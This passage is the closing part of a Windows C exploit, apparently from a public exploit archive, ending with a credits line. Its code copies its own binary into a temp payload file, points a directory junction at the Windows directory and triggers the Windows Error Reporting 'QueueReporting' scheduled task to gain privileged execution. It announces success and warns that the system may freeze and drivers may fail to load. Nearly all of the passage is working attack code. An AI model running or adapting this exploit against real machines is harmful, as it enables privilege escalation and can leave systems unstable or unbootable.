{ 0 }; GetFileSizeEx(hself, &li); void* exebuff = malloc(li.QuadPart); if (!ReadFile(hself, exebuff, li.QuadPart, &readbytes, NULL)) { printf("[!] Failed to read current executable binary, error: %d\n", GetLastError()); return 1; } CloseHandle(hself); readbytes = 0; OVERLAPPED ovp = { 0 }; ovp.hEvent = CreateEvent(NULL, FALSE, FALSE, NULL); if (WriteFile(htempfile, exebuff, li.QuadPart, &readbytes, &ovp) == ERROR_IO_PENDING) { printf("[!] Failed to write payload file, error: %d\n", GetLastError()); return 1; } WaitForSingleObject(ovp.hEvent, INFINITE); CloseHandle(ovp.hEvent); free(exebuff); printf("[*] Stage 9: Finalizing and detaching...\n"); CloseHandle(heicar2); MoveToTempDir(htempfile); MoveToTempDir(hdirtmp); MoveToTempDir(hdir); HANDLE hparent = NULL; UNICODE_STRING _workdir = { 0 }; RtlInitUnicodeString(&_workdir, workdir2); OBJECT_ATTRIBUTES workdirobjattr = { 0 }; InitializeObjectAttributes(&workdirobjattr, &_workdir, OBJ_CASE_INSENSITIVE, NULL, NULL); iostat = { 0 }; stat = NtCreateFile(&hparent, FILE_WRITE_ATTRIBUTES, &workdirobjattr, &iostat, NULL, NULL, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, FILE_OPEN, FILE_DIRECTORY_FILE, NULL, NULL); if (stat) { printf("[!] Failed to open file: %ws, error: 0x%0.8X\n", workdir2, stat); return 1; } wchar_t __tmp[MAX_PATH] = { 0 }; GetWindowsDirectory(__tmp, MAX_PATH); wchar_t dest[MAX_PATH] = { L"\\??\\" }; wcscat(dest, __tmp); if (!CreateJunction(hparent, dest)) { return 1; } CloseHandle(hparent); CloseHandle(hdirtmp); CloseHandle(hdir); DetachVirtualDisk(hvirtdisk, DETACH_VIRTUAL_DISK_FLAG_NONE, NULL); CloseHandle(hvirtdisk); WaitForSingleObject(hthread, INFINITE); CloseHandle(hthread); CloseHandle(htempfile); g_poseidonexit = true; Sleep(500); printf("[*] Stage 11: Triggering persistence...\n"); HRESULT hr = S_OK; ITaskService* pTaskSvc = NULL; hr = CoInitialize(NULL); if (SUCCEEDED(hr)) { hr = CoCreateInstance(CLSID_TaskScheduler, NULL, CLSCTX_INPROC_SERVER, IID_ITaskService, (void**)&pTaskSvc); if (FAILED(hr)) { printf("[!] Failed to initialize task scheduler COM server.\n"); CoUninitialize(); return 1; } } else { return 1; } hr = pTaskSvc->Connect(_variant_t(), _variant_t(), _variant_t(), _variant_t()); if (hr) { printf("[!] Failed to connect to task scheduler service, error: 0x%0.8X\n", hr); return 1; } ITaskFolder* taskfolder = NULL; hr = pTaskSvc->GetFolder((BSTR)L"\\Microsoft\\Windows\\Windows Error Reporting", &taskfolder); if (hr) { printf("[!] Failed to get task scheduler folder, error: 0x%0.8X\n", hr); return 1; } IRegisteredTask* taskex = NULL; hr = taskfolder->GetTask((BSTR)L"QueueReporting", &taskex); if (hr) { printf("[!] Failed to obtain task object, error: 0x%0.8X\n", hr); return 1; } IRunningTask* runningtask = NULL; hr = taskex->Run(_variant_t(), &runningtask); if (hr) { printf("[!] Failed to run scheduled task, error: 0x%0.8X\n", hr); return 1; } if (!ConnectNamedPipe(hpipe, NULL)) { printf("[!] ConnectNamedPipe failed, error: %d\n", GetLastError()); return 1; } printf("\n============================================================\n"); printf(" [!!] EXPLOIT SUCCESSFUL\n"); printf(" System should now be in a frozen/deadlocked state.\n"); printf(" Some drivers may fail to load on next boot.\n"); printf("============================================================\n\n"); runningtask->Release(); taskex->Release(); taskfolder->Release(); pTaskSvc->Release(); CoUninitialize(); return 0; } Greetings to :============================================================================== jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)| ============================================================================================